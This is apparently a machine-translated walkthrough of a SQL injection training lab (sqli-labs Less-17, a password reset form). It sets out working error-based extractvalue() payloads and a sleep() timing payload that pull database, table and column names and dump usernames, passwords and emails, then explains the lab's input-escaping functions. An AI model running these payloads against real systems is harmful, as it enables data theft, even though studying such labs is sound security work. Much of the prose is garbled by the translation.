We can see this off is a process to modify the password, use that update statement, when used with select is the same, we only need the original closure, construct your own payload.
Try error
Username:admin
Password:1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'admin'' at line 1
See ADMIN '' instructions for use in the process of the password is'.
Next, using a blind for injection.
First introduced here about how to use extractvalue () function error injection.
extractvalue (): XML document query function
Syntax: extractValue (target xml documents, xml path)
The second parameter is operable xml position in place, xml document to locate the character position is / xxx / xxx / xxx / ... this format, if we write a different format, it will error and will return us to write the format of illegal content, illegal content and this is what we want the contents of the query.
The second parameter query normal position format / xxx / xx / xx / xx, even if no error will not find the
select username from security.users where id=1 and (extractvalue('anything','/x/xx'));
Use concat () splice '/' are the same effect, the following statement is a query 'Anything' position is / Database () Content
select username from security.users where id=1 and (extractvalue('anything',concat('/',(select database()))));
But here there is no syntax error, not error, deliberately written the following syntax error:
select username from security.users where id=1 and (extractvalue('anything',concat('~',(select database()))));
As it can be seen, at the beginning of the content - not xml format syntax error, but what appears unrecognized content, so that to achieve its purpose.
One thing to note, extractvalue can query string of maximum length () is 32, that is, if we want results more than 32, you need to use substring () function interception, a view 32
5 schematically here before the query:
select username from security.users where id=1 and (extractvalue('anything',concat('~',substring((select database()),1,5))));
Well, now we understand the principle, try it.
First, obtain database () value
uname=admin&passwd=1' and extractvalue(1,concat(0x7e,(select database()),0x7e))#&submit=Submit
Wherein the ASCII code is 0x7e, - the result of decoding.
Then select statement can use the library to continue to get the name of the database, table and field names. The same query with union injected. Because the error injection and displays a result, it is necessary to limit the use of statements that apply to the query result, or use group_concat function for printing results on a single line display.
Other databases to obtain the library name
uname=admin&passwd=1' and extractvalue(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e)) #&submit=Submit
You can also use group_concat (schema_name) one-time check out all of the database library name
uname=admin&passwd=1' and extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e)) #&submit=Submit
As shown above, since the results show only the first 32 bits, we can use the substring () function to see the data after 32
uname=admin&passwd=1' and extractvalue(1,concat(0x7e,substring((select group_concat(schema_name) from information_schema.schemata),30,32),0x7e)) #&submit=Submit
Get the current name of the database table
uname=admin&passwd=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e)) #&submit=Submit
Gets the field name users table
uname=admin&passwd=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e)) #&submit=Submit
Access to content users table
uname=admin&passwd=1' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3e,password) from users),0x7e)) #&submit=Submit
As shown above will be given: You can not specify target table 'users' for update in FROM clause
But we can use this method of blasting other table
uname=admin &passwd=1' and extractvalue(1,concat(0x7e,(select group_concat(id,0x3a,email_id) from emails),0x7e)) #&submit=Submit
Of course, the delay can be injected with, you can see a significant effect of time delay
uname=admin&passwd=11'and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&submit=Submit
Other ways here is not demonstrated. Think for themselves Yo! ~
Question: When looking at the source code, to make only one select statement, then why do not we constructed from the username at it?
In fact, we can see a function in the source code. check_input () function.
function check_input($value)
{
if(!empty($value))
{
// truncation (see comments)
$value = substr($value,0,15);
}
// Stripslashes if magic quotes enabled
if (get_magic_quotes_gpc())
{
$value = stripslashes($value);
}
// Quote if not a number
if (!ctype_digit($value))
{
$value = "'" . mysql_real_escape_string($value) . "'";
}
else
{
$value = intval($value);
}
return $value;
}
Here we introduce a few function you will understand.
★addslashes()
addslashes () function returns a character string is added before the predefined backslash character.
Predefined characters are:
-
apostrophe(')
-
Double quotes(")
-
The backslash (\)
-
NULL
Tip: This function can be used to store strings in the database and the database query string ready.
Note: By default, PHP for all GET, POST and COOKIE data automatically run addslashes (). So you should not have escaped string using addslashes (), because this would lead to double-escape. Function may be used when this happens get_magic_quotes_gpc () is detected.
Syntax: addslashes (string)
| parameter |
description |
| string |
essential. Specifies the string to be escaped. |
| return value: |
Returns a string has been escaped. |
| PHP version: |
4+ |
★stripslashes()
Function deleted by addslashes () backslash function added.
★mysql_real_escape_string()
Function escaped strings in SQL statements used special characters.
The following characters are affected:
-
\x00
-
\n
-
\r
-
\
-
'
-
"
-
\x1a
If successful, the function returns a string to be escaped. If it fails, false is returned.
Syntax: mysql_real_escape_string (string, connection)
| parameter |
description |
| string |
essential. Specifies the string to be escaped. |
| connection |
Optional. Provisions MySQL connection. If not specified, it is used on a connection. |
Description: This function will escape special characters in the string, taking into account the current character set of the connection, can be used to secure the mysql_query () .
In our check_input less17 of (), the username of processing a variety of escape, so here can not be injected using a username.
reference: